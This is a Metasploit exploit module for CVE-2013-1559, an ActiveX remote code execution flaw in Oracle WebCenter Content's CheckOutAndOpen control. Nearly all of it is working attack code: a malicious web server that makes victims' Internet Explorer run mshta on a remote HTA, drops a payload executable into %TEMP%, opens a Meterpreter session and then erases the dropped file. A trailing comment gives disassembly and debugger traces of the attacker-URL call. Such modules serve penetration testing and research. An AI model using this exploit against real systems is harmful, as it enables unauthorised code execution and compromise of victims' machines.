## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution", 'Description' => %q{ This modules exploits a vulnerability found in the Oracle WebCenter Content CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where user controlled input is used to call ShellExecuteExW(). This module abuses the control to execute an arbitrary HTA from a remote location. This module has been tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle WebCenter Content 11.1.1.6.0. }, 'License' => MSF_LICENSE, 'Author' => [ 'rgod ', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-1559' ], [ 'OSVDB', '92386' ], [ 'BID', '59122' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-094/' ] ], 'Payload' => { 'Space' => 2048, 'StackAdjustment' => -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f -k' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Apr 16 2013", 'DefaultTarget' => 0)) end def exploit @var_exename = rand_text_alpha(5 + rand(5)) + ".exe" @dropped_files = [ @var_exename ] super end def on_new_session(session) if session.type == "meterpreter" session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") end @dropped_files.delete_if do |file| win_file = file.gsub("/", "\\\\") if session.type == "meterpreter" begin wintemp = session.fs.file.expand_path("%TEMP%") win_file = "#{wintemp}\\#{win_file}" session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) session.fs.file.rm(win_file) print_good("Deleted #{file}") true rescue ::Rex::Post::Meterpreter::RequestError print_error("Failed to delete #{win_file}") false end end end end def build_hta(cli) var_shellobj = rand_text_alpha(rand(5)+5); var_fsobj = rand_text_alpha(rand(5)+5); var_fsobj_file = rand_text_alpha(rand(5)+5); var_vbsname = rand_text_alpha(rand(5)+5); var_writedir = rand_text_alpha(rand(5)+5); var_origLoc = rand_text_alpha(rand(5)+5); var_byteArray = rand_text_alpha(rand(5)+5); var_writestream = rand_text_alpha(rand(5)+5); var_strmConv = rand_text_alpha(rand(5)+5); p = regenerate_payload(cli); exe = generate_payload_exe({ :code => p.encoded }) # Doing in this way to bypass the ADODB.Stream restrictions on JS, # even when executing it as an "HTA" application # The encoding code has been stolen from ie_unsafe_scripting.rb print_status("Encoding payload into vbs/javascript/hta..."); # Build the content that will end up in the .vbs file vbs_content = Rex::Text.to_hex(%Q| Dim #{var_origLoc}, s, #{var_byteArray} #{var_origLoc} = SetLocale(1033) |) # Drop the exe payload into an ansi string (ansi ensured via SetLocale above) # for conversion with ADODB.Stream vbs_ary = [] # The output of this loop needs to be as small as possible since it # gets repeated for every byte of the executable, ballooning it by a # factor of about 80k (the current size of the exe template). In its # current form, it's down to about 4MB on the wire exe.each_byte do |b| vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % b)})\n") end vbs_content << vbs_ary.join("") # Continue with the rest of the vbs file; # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent # Then use ADODB.Stream again to write the binary to file. #print_status("Finishing vbs..."); vbs_content << Rex::Text.to_hex(%Q| Dim #{var_strmConv}, #{var_writedir}, #{var_writestream} #{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{@var_exename}" Set #{var_strmConv} = CreateObject("ADODB.Stream") #{var_strmConv}.Type = 2 #{var_strmConv}.Charset = "x-ansi" #{var_strmConv}.Open #{var_strmConv}.WriteText s, 0 #{var_strmConv}.Position = 0 #{var_strmConv}.Type = 1 #{var_strmConv}.SaveToFile #{var_writedir}, 2 SetLocale(#{var_origLoc})|) hta = <<-EOS EOS return hta end def on_request_uri(cli, request) agent = request.headers['User-Agent'] if agent !~ /MSIE \d/ print_error("Browser not supported: #{agent.to_s}") send_not_found(cli) return end print_status("Request received for #{request.uri}"); if request.uri =~ /\.hta$/ hta = build_hta(cli) print_status("Sending HTA application") send_response(cli, hta, {'Content-Type'=>'application/hta'}) return end uri = "#{get_uri}#{rand_text_alpha(rand(3) + 3)}.hta" html = <<-EOS EOS print_status("Sending HTML") send_response(cli, html, {'Content-Type'=>'text/html'}) end end =begin * The vulnerable control tries to solve how to open the provided extension .text:100099FC lea eax, [ebp+830h+Src] .text:10009A02 push eax ; lpResult .text:10009A03 lea eax, [ebp+830h+Directory] .text:10009A06 push eax ; lpDirectory .text:10009A07 lea eax, [ebp+830h+PathName] .text:10009A0D push eax ; lpFile .text:10009A0E call ds:FindExecutableW ; This function returns the executable associated with the specified file for the default verb * If succeeds, the provided user data is used as argument: .text:10009D8F lea eax, [ebp+psz] .text:10009D95 mov [ebp+pExecInfo.lpFile], eax .text:10009D9B mov eax, [ebp+var_238] .text:10009DA1 mov [ebp+pExecInfo.cbSize], 3Ch .text:10009DAB mov [ebp+pExecInfo.fMask], 2000000h .text:10009DB5 mov [ebp+pExecInfo.hwnd], ebx .text:10009DBB mov [ebp+pExecInfo.lpVerb], offset aOpen ; "open" .text:10009DC5 jnb short loc_10009DCD .text:10009DC7 lea eax, [ebp+var_238] .text:10009DCD .text:10009DCD loc_10009DCD: ; CODE XREF: make_ShellExecute_sub_10009ACC+2F9j .text:10009DCD mov [ebp+pExecInfo.lpParameters], eax .text:10009DD3 lea eax, [ebp+pExecInfo] .text:10009DD9 push eax ; pExecInfo .text:10009DDA mov [ebp+pExecInfo.lpDirectory], ebx .text:10009DE0 mov [ebp+pExecInfo.nShow], 0Ah .text:10009DEA call ds:ShellExecuteExW * On the debugger: Breakpoint 1 hit eax=0201ef6c ebx=00000000 ecx=00000000 edx=03850608 esi=00000008 edi=00000000 eip=10009dea esp=0201ee08 ebp=0201f200 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212 CheckOutAndOpen!DllUnregisterServer+0x7108: 10009dea ff156cd20210 call dword ptr [CheckOutAndOpen!DllUnregisterServer+0x2a58a (1002d26c)] ds:0023:1002d26c={SHELL32!ShellExecuteExW (7ca02f03)} 0:007> dd esp 0201ee08 0201ef6c <== pExecInfo 0:007> dd 0201ef6c 0201ef6c 0000003c 02000000 00000000 10031468 0201ef7c 0201efe0 03854688 0:007> du 0201efe0 0201efe0 "C:\WINDOWS\system32\mshta.exe" 0:007> du 03854688 03854688 ""http://192.168.172.1:8080/xKRTv" 038546c8 "m0mqpAt7sEYdVq.hta"" This code allows to launch other executables with user data provided as argument, but at the moment I like the HTA solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so the target should have the WebClient service enabled, which is only enabled by default on XP SP3. =end